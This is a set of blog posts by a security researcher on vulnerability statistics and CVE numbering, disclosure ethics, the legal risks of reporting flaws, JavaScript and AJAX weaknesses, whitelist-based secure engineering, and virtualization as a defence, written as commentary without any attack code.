Posts by pmeunier

2007: The year of the 9,999 vulnerabilities?

A look at the National Vulnerability Database statistics will reveal that the number of vulnerabilities found yearly has greatly increased since 2003:

YearVulnerabilities%Increase
20021959N/A
20031281-35%
2004236785%
20054876106%
2006660535%



Average yearly increase (including the 2002-2003 decline): 48%

6605*1.48= 9775

So, that’s not quite 9999, but fairly close.  There’s enough variance that hitting 9999 in 2007 seems a plausible event.  If not in 2007, then it seems likely that we’ll hit 9999 in 2008.  So, what does it matter?



MITRE’s CVE effort uses a numbering scheme for vulnerabilities that can accomodate only 9999 vulnerabilities:  CVE-YEAR-XXXX.  Many products and vulnerability databases that are CVE-compatible (e.g., my own Cassandra service, CIRDB, etc…) use a field of fixed size just big enough for that format.  We’re facing a problem similar, although much smaller in scope, to the year-2000 overflow.  When the board of editors of the CVE was formed, the total number of vulnerabilities known, not those found yearly, was in the hundreds.  A yearly number of 9999 seemed astronomical;  I’m sure that anyone who would have brought up that as a concern back then would have been laughed at.  I felt at the time that it would take a security apocalypse to reach that.  Yet there we are, and a fair warning to everyone using or developing CVE-compatible products.



Kudos to the National Vulnerability Database and the MITRE CVE teams for keeping up under the onslaught.  I’m impressed.

Vulnerability disclosure grace period needs to be short, too short for patches

One of the most convincing arguments for full disclosure is that while the polite security researcher is waiting for the vendor to issue a patch, that vulnerability MAY have been sold and used to exploit systems, so all individuals in charge of administering a system have a right to know ALL the details so that they can protect themselves, and that right trumps all other rights.

That argument rests upon the premise that if one person found the vulnerability, it is possible for others to find it as well.  The key word here is “possible”, not “likely”, or so I thought when I started writing this post.  After all, vulnerabilities can be hard to find, which is a reason why products are released with vulnerabilities.  How likely is it that two security researchers will find the same vulnerability? 

Mathematically speaking, the chance that two successful security researchers (malicious or not) will find the same flaw is similar to the birthday problem.  Let’s assume that there are X security researchers, each finding a vulnerability out of N vulnerabilities to be found.  In 2006, 6560 vulnerabilities were found, and 4876 in 2005 (according to the national vulnerability database).  Let’s assume that the number of vulnerabilities available to be found in a year is about 10 000;  this is most surely an underestimation.  I’ll assume that all of these are equally likely to be found.  An additional twist on the birthday problem is that people are entering and leaving the room;  not all X are present at the same time.  This is because we worry about two vulnerabilities being found within the grace period given to a vendor. 

If there are more successful researchers in the room than vulnerabilities, then necessarily there has been a collision.  Let’s say that the grace period given to a vendor is one month, so Y = X/12.  Then, there would need to be 120,000 successful security researchers for collisions to be guaranteed.  For fewer researchers, the likelihood of two vulnerabilities being the same is then 1- exp(-(Y(Y-1))/2N) (c.f. Wikipedia).  Let’s assume that there are 5000 successful researchers in a given year, to match the average number of vulnerabilities reported in 2005 and 2006.  The probability that two researchers can find the same vulnerability over a given time period is:

Grace PeriodProbability
1 month0.9998
1 week0.37
1 day0.01


In other words, nowadays the grace period given to a vendor should be on the order of one or two days, if we only take this risk into account.  Has it always been like this?

Let’s assume that in any given year, there are twice as many vulnerabilities to be found than there are reported vulnerabilities.  If we make N = 2X and fix the grace period to one week, what was the probability of collision in different years?  The formula becomes 1- exp(-(X/52(X/52-1))/4X), where we take the ceiling of X/52.

YearVulnerabilities ReportedProbability
1988-19960
19972520.02
19982460.02
19999180.08
200010180.09
200116720.15
200219590.16
200312810.11
200423630.20
200548760.36
200665600.46

So, according to this table, a grace period of one week would have seemed an acceptable policy before 2000, perhaps fair in 2000-2003, but is now unacceptably long.  These calculations are of course very approximative, but they should be useful enough to serve as guidelines.  They show, much to my chagrin, that people arguing for the full and immediate disclosure of vulnerabilities may have a point. 



In any case, we can’t afford, as a matter of national and international cyber-security, to let vendors idly waste time before producing patches;  vendors need to take responsibility, even if the vulnerability is not publicly known.  This exercise also illustrates why a patch-it-later attitude could have seemed almost excusable years ago, but not now.  These figures are a serious problem for managing security with patches, as opposed to secure coding from the start:  I believe that it is not feasible anymore for traditional software development processes to issue patches before the threat of malicious disclosure and exploits becomes significant.  Finally, the grace period that we can afford to give vendors may be too short for them to issue patches, but that doesn’t mean it should be zero.

Note:  the astute reader will remark that the above statistics is for any two vulnerabilities to match, whereas for patching we are talking about a specific vulnerability being discovered independently.  The odds of that specific ocurrence are much smaller.  However, we need to consider all vulnerabilities in a systematic management by patches, which reverts to the above calculations.

 

Security Vigilantes Becoming Small-Time Terrorists

Vulnerability disclosure is such a painful issue.  However, some people are trying to make it as painful as possible.  They slap and kick people with the release of 0-day vulnerabilities, and tell them it’s for their own good.  In their fantasies, sometime in the future, we’ll be thanking them.  In reality, they make me feel sympathy for the vendors. 

They cite disillusionment with the “responsible disclosure” process.  They believe that this process forces them somehow to wait indefinitely on the pleasure of the vendor.  Whereas it is true that many vendors won’t and don’t fix known issues unless they are known publicly or are threatened with a public disclosure, it bemuses me that these people are unwilling to give the vendor a chance and wait a few weeks.  They use the excuse of a few bad vendors, or a few occurrences of delays in fixes, even “user smugness”, to systematically treat vendors and their clients badly.  This shows recklessness, impatience, intransigence, bad judgment and lack of discernment. 

I agree that reporting vulnerabilities correctly is a thankless task.  Besides my previous adventure with a web application, when reporting a few vulnerabilities to CERT/CC, I received no replies ever, not even an automated receipt.  It was like sending messages into a black hole.  Some vendors can become defensive and unpleasant instead.  However, that doesn’t provide a justification for not being gallant, and first giving an opportunity for the opposite side to behave badly.  If you don’t do at least that, then you are part of the problem.  As in many real life problems, the first one to use his fists is the loser.

What these security vigilantes are really doing is using as hostages the vendor’s clients, just to make an ideological point.  That is, they use the threat of security exploits to coerce or intimidate vendors and society for the sake of their objectives.  They believe that the ends justify the means.  Blackmail is done for personal gain, so what they are doing doesn’t fit the blackmail category, and it’s more than simple bullying.  Whereas the word “terrorism” has been overused and brandished too often as a scarecrow, compare the above to the definition of terrorism.  I realize that using this word, even correctly, can raise a lot of objections.  If you accept that a weaker form of terrorism is the replacement of physical violence with other threats, then it would be correct to call these people “small-time terrorists” (0-day pun intended).  Whatever you want to call them, in my opinion they are no longer just vigilantes, and certainly not heroes.  The only thing that can be said for them is, at least they didn’t try to profit directly from the disclosures.

Finally, let me make clear that I want to be informed, and I want disclosures to happen.  However, I’m certain that uncivil 0-day disclosures aren’t part of the answer.  There is an interesting coverage of this and related issues at C/NET.

VMworld 2006: How virtualization changes the security equation

This session was very well attented (roughly 280 people), which is encouraging.  In the following, I will mix all the panel responses together without differentiating the sources.

It was said that virtualization can make security more acceptable, by contrast to past security solutions and suggested practices that used to be hard to deploy or adopt.  Virtual appliances can help security by introducing more boundaries between various data center functions, so if one is compromised the entire data center hasn’t been compromised.  One panel member argued that virtual appliances (VA) can leverage the expertise of other people.  So, presumably if you get a professional VA it may be installed better and more securely than an average system admin could, and you could pass liability on to them (interestingly, someone else told me outside this session that liability issues were what stopped them from publishing or selling virtual appliances).

I think you may also inherit problems due to the vendor philosophy of delivering functional systems over secure systems.  As always, the source of the virtual appliances, the processes used to create them, the requirements that they were designed to meet, should be considered in evaluating the trust that can be put into them.  Getting virtual appliances doesn’t necessarily solve the hardening problem.  Except, now instead of having one OS to harden, you have to repeat the process N times, where N is the number of virtual appliances you deploy.

As a member of the panel argued, virtualization doesn’t make things better or worse, it still all depends on the practices, processes, procedures, and policies used in managing the data center and the various data security and recovery plans.  Another pointed out that people shouldn’t assume that virtual appliances or virtualization provide security out-of-the-box.  Out of all malicious software, currently 4-5% check if they are running inside a virtual machine;  this may become more common.

It was said that security is not the reason why people are deploying virtualization now.  Virtualization is not as strong as using several different physical, specialized machines, due to the shared resources and shared communication channels.  Virtualization would be much more useful on the client side than on the data center for improving security.  Nothing else of interest was said.

Unfortunately, there was no time for me to ask what the panel thought of the idea of opening VMware to plugins that could perform various security functions (taint tracking and various attack protection schemes, IDS, auditing, etc…).  After the session one of the panel members mentioned that this was being looked at, and that it raised many problems, but would not elaborate.  In my opinion, it could trump the issue of Microsoft (supposedly) closing Windows to security vendors, but they thought of everything!  Microsoft’s EULA forbids running certain versions of Windows on virtual machines.  I wonder about the wisdom of this, as restricting the choices of security solutions can only hurt Microsoft and their users.  Is this motivated by the fear of people cracking the DRM mechanism(s)?  Surely just the EULA can’t prevent that—crackers will do what they want.  As Windows could simply check to see if it is running inside a VM, DRMed content could be protected by refusing to be performed under those conditions, without making all of Windows unavailable.  The fact that the most expensive version of Windows allows running inside a virtual machine (even though performing DRMed content is still forbidden) hints that it’s mostly due to marketing greed, but on the whole I am puzzled by those policies.  It certainly won’t help security research and forensic investigations (are forensic examinators exempt from the licensing/EULA restrictions?  I wonder).

VMworld 2006:  Teaching (security) using virtual labs

This talk by Marcus MacNeill (Surgient) discussed the Surgient Virtual Training Lab used by CERT-US to train military personnel in security best practices, etc…  I was disappointed because the talk didn’t discuss the challenges of teaching security, and the lessons learned by CERT doing so, but instead focused on how the product could be used in a teaching environment.  Not surprisingly, the Surgient product resembles both VMware’s lab manager and ReAssure.  However, the Surgient product doesn’t support the sharing of images, and stopping and restarting work, e.g. development work by users (from what I saw—if it does it wasn’t mentioned).  They mentioned that they had patented technologies involved, which is disturbing (raise your hand if you like software patents).  ReAssure meets (or will soon, thanks to the VIX API) all of the requirements he discussed for teaching, except for student shadowing (seeing what a student is attempting to do).  So, I would be very interested in seeing teaching labs using ReAssure as a support infrastructure.  There are of course other teaching labs using virtualization that have been developed at other universities and colleges;  the challenge is of course to be able to design courses and exercises that are portable and reusable.  We can all gain by sharing these, but for that we need a common infrastructure where all these exercises would be valid.

VMworld 2006:  ReAssure (CERIAS), VIX and Lab Manager (VMware)

The conference is surprisingly huge (6000 people).  Virtualization is obviously important to IT now.  I am looking forward to the security-related talks (I’ll post about them later).  Here are a few notes from the sessions I attended:

  • Saturday a VMware team shot a video of yours truly talking about ReAssure (of course I became tongue-tied when the camera was turned on!).  It will be presented at the general session Wednesday morning.  I hope it generates interest in ReAssure!
  • The VIX API on Tuesday morning was a very interesting session.  It will enable the remaining automation functionality of ReAssure.  It allows to automate the powering on and off of virtual machines, the taking of snapshots, transfering files (e.g., results) between the host and guest OS, and even starting programs in the guest OS!  It was introduced with VMWare server 1.0 last summer, but I hadn’t noticed.  It is still work in progress though;  there’s support only for C, Perl and COM (no Python, although I was told that there was a source forge project for that).
  • The VMware lab manager (introduced last summer) is very much like ReAssure.  Except, ReAssure doesn’t have IP conflicts, and in ReAssure all experiments (“deployed configurations”) are independent and their traffic is isolated with VLANs.  In some respects, VMware lab manager is more sophisticated, and in others it is more primitive.  For example, all networks in Lab Manager are flat (and even, all experiments share the same network, apparently), whereas ReAssure supports complex networks.  To resolve IP conflicts, Lab Manager uses “fenced networks” which is a NAT hack.  Lab Manager is also limited to fibre channel NAS, and is tied to VMware ESX while disabling most of what makes ESX flexible and interesting (ReAssure uses the VMware server freeware).  I’m excited about the VIX API (see above) because will bring ReAssure beyond lab manager, by allowing snapshots, suspend and resume functionality, etc…I wonder what I need to do to make ReAssure more well-known and adopted.  I haven’t found any bugs in it for a while, so I think I’ll officially release the first final (not beta) version very soon (e.g., Friday or next week).

So you think AJAX and Web 2.0 are all that and a bag of chips

You know, I would feel a lot better about this technology if someone had fixed basic problems with the way browsers handle JavaScript, about JavaScript policy specifications and compliance testing, and if there were good, usable and mature static analysis tools that could detect cross-site scripting vulnerabilities (Pixy by Jovanovic et al. comes to mind as a promising open source tool), and if people used them.  These problems have been known for a long time.

  1. Same origin policy and shared servers.  So, my home page is http://homes.cerias.purdue.edu/~pmeunier/;  if I put a nasty javascript there, it can access or change the contents of other CERIAS home pages if you follow a link from my page, or if my page opens another home page for you.  I made a demo which for Safari users displays Adam Hammer’s home page url but with contents of my choosing (with apologies to Adam).  Firefox is a bit smarter and the url displayed is instead that of my page, which could clue attentive users to the fact that the content really comes from elsewhere.  Adam doesn’t actually have a home page there.
  2. Modern browsers still can’t survive a visit to this site (WARNING!  Your browser will likely crash or become unusable when you click buttons on that site):  Nasty Javascript Bombs (I didn’t try all browsers, like Opera, but Safari died horrible deaths)
  3. Modern browsers can still be captured:  Firefox users visit (WARNING!  you won’t be able to return) the jail, do not collect $200.
  4. Searching for JavaScript-related vulnerabilities in 2006 in the National Vulnerability Database gives 124 matches (and the year is not even over).  3 of those are accidental hits (because “javascript” was part of a file name or such).  About 50% are cross-site scripting vulnerabilities, that could include the above Javascript (and likely worse code than changing your choice of hero). About 40% are coding errors in the JavaScript implementation.  About 10% are still issues with the enforcement of JavaScript default security policies, or things that should explicitly be stated as part of default policies (e.g, CVE-2006-2900 and CVE-2006-2894, abusing Javascript keystroke events to trick users into typing where they didn’t mean to).  Cross-site scripting vulnerabilities are hard to avoid because scripts can be embedded almost anywhere inside HTML.  The separation between code (JavaScript) and data (HTML) is flimsy and complex.  I predict that XSS vulnerabilities will be to AJAX applications what buffer overflows and format string vulnerabilities are to C:  a real pain.  There is no sign that browsers have matured enough yet to be trusted in handling JavaScript safely, and this will likely continue for many years.
  5. Perfectly compliant JavaScript and browsers can be used to scan internal networks and even perform limited exploits.
  6. JavaScript seems to be used most of the time to perform tasks that are user-unfriendly (hide user interface elements and generally remove control from the user, create pop-unders, show ads, track you by history, etc…).  So, I should expose myself to these, and the above and future vulnerabilities, so you can program something that’s a little slicker, or poorly duplicates the functionality of executables on my system?  Huh.

So, tell me again;  do you really want to build castles on that foundation?  It sounds like a bad idea to me.  We can always hope that eventually, AJAX horror stories (to come) will drive security improvements, but I’d rather not be in the crowd of early sufferers.  At least, please do me a favor and honor the principle of graceful degradation, so that if I visit your web site with JavaScript turned off, I can still make some use of it.

Reporting Vulnerabilities is for the Brave

I was involved in disclosing a vulnerability found by a student to a production web site using custom software (i.e., we didn’t have access to the source code or configuration information).  As luck would have it, the web site got hacked.  I had to talk to a detective in the resulting police investigation.  Nothing bad happened to me, but it could have, for two reasons. 

The first reason is that whenever you do something “unnecessary”, such as reporting a vulnerability, police wonder why, and how you found out.  Police also wonders if you found one vulnerability, could you have found more and not reported them?  Who did you disclose that information to?  Did you get into the web site, and do anything there that you shouldn’t have?  It’s normal for the police to think that way.  They have to.  Unfortunately, it makes it very uninteresting to report any problems.

A typical difficulty encountered by vulnerability researchers is that administrators or programmers often deny that a problem is exploitable or is of any consequence, and request a proof.  This got Eric McCarty in trouble—the proof is automatically a proof that you breached the law, and can be used to prosecute you!  Thankfully, the administrators of the web site believed our report without trapping us by requesting a proof in the form of an exploit and fixed it in record time.  We could have been in trouble if we had believed that a request for a proof was an authorization to perform penetration testing.  I believe that I would have requested a signed authorization before doing it, but it is easy to imagine a well-meaning student being not as cautious (or I could have forgotten to request the written authorization, or they could have refused to provide it…).  Because the vulnerability was fixed in record time, it also protected us from being accused of the subsequent break-in, which happened after the vulnerability was fixed, and therefore had to use some other means.  If there had been an overlap in time, we could have become suspects.

The second reason that bad things could have happened to me is that I’m stubborn and believe that in a university setting, it should be acceptable for students who stumble across a problem to report vulnerabilities anonymously through an approved person (e.g., a staff member or faculty) and mechanism.  Why anonymously?  Because student vulnerability reporters are akin to whistleblowers.  They are quite vulnerable to retaliation from the administrators of web sites (especially if it’s a faculty web site that is used for grading).  In addition, student vulnerability reporters need to be protected from the previously described situation, where they can become suspects and possibly unjustly accused simply because someone else exploited the web site around the same time that they reported the problem.  Unlike security professionals, they do not understand the risks they take by reporting vulnerabilities (several security professionals don’t yet either).  They may try to confirm that a web site is actually vulnerable by creating an exploit, without ill intentions.  Students can be guided to avoid those mistakes by having a resource person to help them report vulnerabilities. 

So, as a stubborn idealist I clashed with the detective by refusing to identify the student who had originally found the problem. I knew the student enough to vouch for him, and I knew that the vulnerability we found could not have been the one that was exploited.  I was quickly threatened with the possibility of court orders, and the number of felony counts in the incident was brandished as justification for revealing the name of the student.  My superiors also requested that I cooperate with the detective.  Was this worth losing my job?  Was this worth the hassle of responding to court orders, subpoenas, and possibly having my computers (work and personal) seized?  Thankfully, the student bravely decided to step forward and defused the situation. 

As a consequence of that experience, I intend to provide the following instructions to students (until something changes):

  1. If you find strange behaviors that may indicate that a web site is vulnerable, don’t try to confirm if it’s actually vulnerable.
  2. Try to avoid using that system as much as is reasonable.
  3. Don’t tell anyone (including me), don’t try to impress anyone, don’t brag that you’re smart because you found an issue, and don’t make innuendos.  However much I wish I could, I can’t keep your anonymity and protect you from police questioning (where you may incriminate yourself), a police investigation gone awry and miscarriages of justice.  We all want to do the right thing, and help people we perceive as in danger.  However, you shouldn’t help when it puts you at the same or greater risk.  The risk of being accused of felonies and having to defend yourself in court (as if you had the money to hire a lawyer—you’re a student!) is just too high.  Moreover, this is a web site, an application;  real people are not in physical danger.  Forget about it.
  4. Delete any evidence that you knew about this problem.  You are not responsible for that web site, it’s not your problem—you have no reason to keep any such evidence.  Go on with your life.
  5. If you decide to report it against my advice, don’t tell or ask me anything about it.  I’ve exhausted my limited pool of bravery—as other people would put it, I’ve experienced a chilling effect.  Despite the possible benefits to the university and society at large, I’m intimidated by the possible consequences to my career, bank account and sanity.  I agree with HD Moore, as far as production web sites are concerned: “There is no way to report a vulnerability safely”.



Edit (5/24/06): Most of the comments below are interesting, and I’m glad you took the time to respond.  After an email exchange with CERT/CC, I believe that they can genuinely help by shielding you from having to answer questions from and directly deal with law enforcement, as well as from the pressures of an employer.  There is a limit to the protection that they can provide, and past that limit you may be in trouble, but it is a valuable service. 

What is Secure Software Engineering?

A popular saying is that “Reliable software does what it is supposed to do.  Secure software does that and nothing else” (Ivan Arce).  However, how do we get there, and can we claim that we have achieved the practice of an engineering science?  The plethora of vulnerabilities found every year (thousands, and that’s just in software that matters or is publicly known) suggests not.  Does that mean that we don’t know how, or that it is just not put into practice for reasons of ignorance, education, costs, market pressures, or something else?

The distinction between artisanal work and engineering work is well expressed in the SEI (Software Engineering Institute) work on capability maturity models.  Levels of maturity range from 1 to 5: 

  1. Ad-hoc, individual efforts and heroics
  2. Repeatable
  3. Defined
  4. Managed
  5. Optimizing (Science)

 
  Artisanal work is individual work, entirely dependent on the (unique) skills of the individual and personal level of organization.  Engineering work aims to be objective, independent from one individual’s perception and does not require unique skills.  It should be reproducible, predictable and systematic.

  In this context, it occurred to me that the security community often suggests using methods that have artisanal characteristics.  We are also somewhat hypocritical (in the academic sense of the term, not deceitful, just not thinking through critically enough).  The methods that are suggested to increase security actually rely on practices we decry.  What am I talking about?  I am talking about black lists.

  A common design error is to create a list of “bad” inputs, bad characters, or other undesirable things.  This is a black list;  it often fails because the enumeration is incomplete, or because the removal of bad characters from the input can result in the production of another bad input which is not caught (and so on recursively).  It turns out more often than not that there is a way to circumvent or fool the black list mechanism.  Black lists fail also because they are based on previous experience, and only enumerate *known* bad input.  The recommended practice is the creation of white lists, that enumerate known good input.  Everything else is rejected. 

  When I teach secure programming, I go through often repeated mistakes, and show students how to avoid them.  Books on secure programming show lists upon lists of “sins” and errors to avoid.  Those are blacklists that we are in effect creating in the minds of readers and students!  It doesn’t stop there.  Recommended development methods (solutions for repeated mistakes) also often take the form of black lists.  For example, risk assessment and threat modeling require expert artisans to imagine, based on past experience, what are likely avenues of attack, and possible damage and other consequences.  The results of those activities are dependent upon unique skill sets, are irreproducible (ask different people and you will get different answers), and attempt to enumerate known bad things.  They build black lists into the design of software development projects. 

  Risk assessment and threat modeling are appropriate for insurance purposes in the physical world, because the laws of physics and gravity on earth aren’t going to change tomorrow.  The experience is collected at geographical, geological and national levels, tabulated and analyzed for decades.  However, in software engineering, black lists are doomed to failure, because they are based on past experience, and need to face intelligent attackers inventing new attacks.  How good can that be for the future of secure software engineering? 

  Precious few people emphasize development and software configuration methods that result (with guarantees) in the creation of provably correct code.  This of course leads into formal methods (and languages like SPARK and the correctness by construction approach), but not necessarily so.  For example, I was recently educated on the existence of a software solution called AppArmor (Suse Linux, Crispin Cowan et al.).  This solution is based on fairly fine-grained capabilities, and granting to an application only known required capabilities;  all the others are denied.  This corresponds to building a white list of what an application is allowed to do;  the developers even say that it can contain and limit a process running as root.  Now, it may still be possible for some malicious activity to take place within the limits of the granted capabilities (if an application was compromised), but their scope is greatly limited.  The white list can be developed simply by exercising an application throughout its normal states and functions, in normal usage.  Then the list of capabilites is frozen and provides protection against unexpected conditions. 

  We need to come up with more white list methods for both development and configuration, and move away from black lists.  This is the only way that secure software development will become secure software engineering.

Edit (4/16/06): Someone pointed out the site http://blogs.msdn.com/threatmodeling/ to me.  It is interesting because it shows awareness of the challenge of getting from an art to a science.  It also attempts to abstract the expert knowledge into an “attack library”, which makes explicit its black list nature.  However, they don’t openly acknowledge the limitations of black lists.  Whereas we don’t currently have a white list design methodology that can replace threat modeling (it is useful!), it’s regrettable that the best everyone can come up with is a black list. 

Also, it occurred to me since writing this post that AppArmor isn’t quite a pure white list methodology, strictly speaking.  Instead of being a list of known *safe* capabilities, it is a list of *required* capabilities.  The difference is that the list of required capabilities, due to the granularity of capabilities and the complexity emerging from composing different capabilities together, is a superset of what is safe for the application to be able to do.  What to call it then?  I am thinking of “permissive white list” for a white list that allows more than necessary, vs a “restrictive white list” for a white list that possibly prevents some safe actions, and an “exact white list” when the white list matches exactly what is safe to do, no more and no less.

Using Virtual Machines to Defend Against Security and Trust Failures

According to the National Vulnerability Database (http://nvd.nist.gov), the number of vulnerabilities found every year increases:  1253 in 2003, 2343 in 2004, and 4734 in 2005.  We take security risks not only by choosing a specific operating system, but also by installing applications and services.  We take risks by browsing the web, because web sites insist on running code on our systems:  JavaScript, Flash (ActionScript), Java, ActiveX, VBscript, QuickTime, and all the plug-ins and browser extensions imaginable.  Applications we pay for want to probe the network to make sure there isn’t another copy running on another computer, creating a vector by which malicious replies could attack us.

  Games refuse to install in unprivileged accounts, so they can run their own integrity checkers with spyware qualities with full privileges (e.g., WoW, but others do the same, e.g., Lineage II), that in turn can even deny you the capability to terminate (kill) the game if it hangs (e.g., Lineage II).  This is done supposedly to prevent cheating, but allows the game companies full access and control of your machine, which is objectionable.  On top of that those games are networked applications, meaning that any vulnerability in them could result in a complete (i.e., root, LocalSystem) compromise. 

  It is common knowledge that if a worm like MyTob compromises your system, you need to wipe the drive and reinstall everything.  This is in part because these worms are so hard to remove, as they attack security software and will prevent firewalls and virus scanners from functioning properly.  However there is also a trust issue—a rootkit could have been installed, so you can’t trust that computer anymore.  So, if you do any sensitive work or are just afraid of losing your work in progress, you need a dedicated gaming or internet PC.  Or do you?

  Company VMWare offers on their web site the free download of VMWare player, as well as a “browser appliance” based on Firefox and Ubuntu Linux.  The advantages are that you don’t need to install and *trust* Firefox.  Moreover, you don’t need to trust Internet Explorer or any other browser anymore.  If a worm compromises Firefox, or malicious JavaScripts change settings and take control of Firefox, you may simply trash the browser appliance and download a new copy.  I can’t overemphasize how much less work this is compared to reinstalling Windows XP for the nth time, possibly having to call the license validation phone line, and frantically trying to find a recent backup that works and isn’t infected too.  As long as VMWare player can contain the infection, your installation is preserved.  Also hosted on the VMWare site are various community-created images allowing you to test various software at essentially no risk, and no configuration work!

  After experiencing this, I am left to wonder, why aren’t all applications like a VMWare “appliance” image, and the operating system like VMWare player?  They should be.  Efforts to engineer software security have obviously failed to contain the growth of vulnerabilities and security problems.  Applying the same solutions the same problems will keep resulting in failures.  I’m not giving up on secure programming and secure software engineering, as I can see promising languages, development methods and technologies appearing, but at the same time I can’t trust my personal computers, and I need to compartmentalize by buying separate machines.  This is expensive and inconvenient.  Virtual machines provide us with an alternative.  In the past, storing entire images of operating systems for each application was unthinkable.  Nowadays, storage is so cheap and abundant that the size of “appliance” images is no longer an issue.  It is time to virtualize the entire machine;  all I now require from the base operating system is to manage a file system and be able to launch VMWare player, with at least a browser appliance to bootstrap…  Well, not quite.  Isolated appliances are not so useful;  I want to be able to transfer documents from appliance to appliance.  This is easily accomplished with a USB memory stick, or perhaps a virtual drive that I can mount when needed.  This shared storage could become a new propagation vector for viruses, but it would be very limited in scope.

  Virtual machine appliances, anyone?

Note (March13, 2006):  Virtual machines can’t defend against cross-site scripting vulnerabilities (XSS), so they are not a solution for all security problems.